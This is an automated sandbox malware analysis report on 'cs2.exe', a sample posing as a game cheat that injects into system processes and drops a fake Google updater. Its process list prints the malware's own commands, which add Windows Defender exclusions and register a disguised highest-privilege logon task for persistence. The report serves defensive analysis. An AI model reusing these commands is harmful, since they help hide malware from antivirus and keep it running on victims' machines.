Malware Analysis Report

2025-04-14 04:16

Sample ID 240609-jel93sff6z
Target cs2.exe
SHA256 4a43e95020312d2bc4725f469e6ba1fa66d164842584b916f24606350ab728f6
Tags
execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a43e95020312d2bc4725f469e6ba1fa66d164842584b916f24606350ab728f6

Threat Level: Known bad

The file cs2.exe was found to be: Known bad.

Malicious Activity Summary

execution

Suspicious use of NtCreateUserProcessOtherParentProcess

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-09 07:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-09 07:34

Reported

2024-06-09 07:37

Platform

win10-20240404-en

Max time kernel

32s

Max time network

41s

Command Line

winlogon.exe

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC c:\windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2948 set thread context of 3456 N/A C:\Users\Admin\AppData\Local\conhost32.exe C:\Windows\System32\dialer.exe
PID 3156 set thread context of 4900 N/A C:\Users\Admin\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\conhost32.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4236 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\conhost32.exe
PID 4236 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\conhost32.exe
PID 4236 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe
PID 4236 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\cs2.exe C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe
PID 2948 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\conhost32.exe C:\Windows\System32\dialer.exe
PID 3456 wrote to memory of 584 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\winlogon.exe
PID 3456 wrote to memory of 640 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\lsass.exe
PID 3456 wrote to memory of 736 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 908 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1008 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\dwm.exe
PID 3456 wrote to memory of 440 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 380 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 592 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1092 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1104 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1204 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1224 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1240 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1248 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1408 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1432 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1456 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1512 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1560 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1608 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1640 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\svchost.exe
PID 3456 wrote to memory of 1756 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\svchost.exe
PID 3456 wrote to memory of 1764 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 3456 wrote to memory of 1776 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1816 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1876 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2012 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 3456 wrote to memory of 1900 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2168 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2272 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2504 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2512 N/A C:\Windows\System32\dialer.exe c:\windows\system32\sihost.exe
PID 3456 wrote to memory of 2620 N/A C:\Windows\System32\dialer.exe c:\windows\system32\taskhostw.exe
PID 3456 wrote to memory of 2640 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2652 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2660 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2708 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2780 N/A C:\Windows\System32\dialer.exe C:\Windows\sysmon.exe
PID 3456 wrote to memory of 2788 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2836 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 2884 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 3092 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 3112 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\wbem\unsecapp.exe
PID 3456 wrote to memory of 3396 N/A C:\Windows\System32\dialer.exe C:\Windows\Explorer.EXE
PID 3456 wrote to memory of 3944 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\RuntimeBroker.exe
PID 3456 wrote to memory of 3796 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\DllHost.exe
PID 3456 wrote to memory of 4964 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1004 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 4296 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 3456 wrote to memory of 3596 N/A C:\Windows\System32\dialer.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
PID 3456 wrote to memory of 2100 N/A C:\Windows\System32\dialer.exe c:\windows\system32\svchost.exe
PID 3456 wrote to memory of 1352 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\DllHost.exe
PID 3456 wrote to memory of 3892 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\ApplicationFrameHost.exe
PID 3456 wrote to memory of 436 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\InstallAgent.exe
PID 3456 wrote to memory of 4040 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\DllHost.exe
PID 3456 wrote to memory of 2948 N/A C:\Windows\System32\dialer.exe C:\Users\Admin\AppData\Local\conhost32.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s NlaSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s StateRepository

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s netprofm

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc

c:\windows\system32\sihost.exe

sihost.exe

c:\windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s CDPSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\System32\InstallAgent.exe

C:\Windows\System32\InstallAgent.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Users\Admin\AppData\Local\Temp\cs2.exe

"C:\Users\Admin\AppData\Local\Temp\cs2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZwBiACMAPgA="

C:\Users\Admin\AppData\Local\conhost32.exe

"C:\Users\Admin\AppData\Local\conhost32.exe"

C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe

"C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Google\Chrome\updater.exe

C:\Users\Admin\Google\Chrome\updater.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
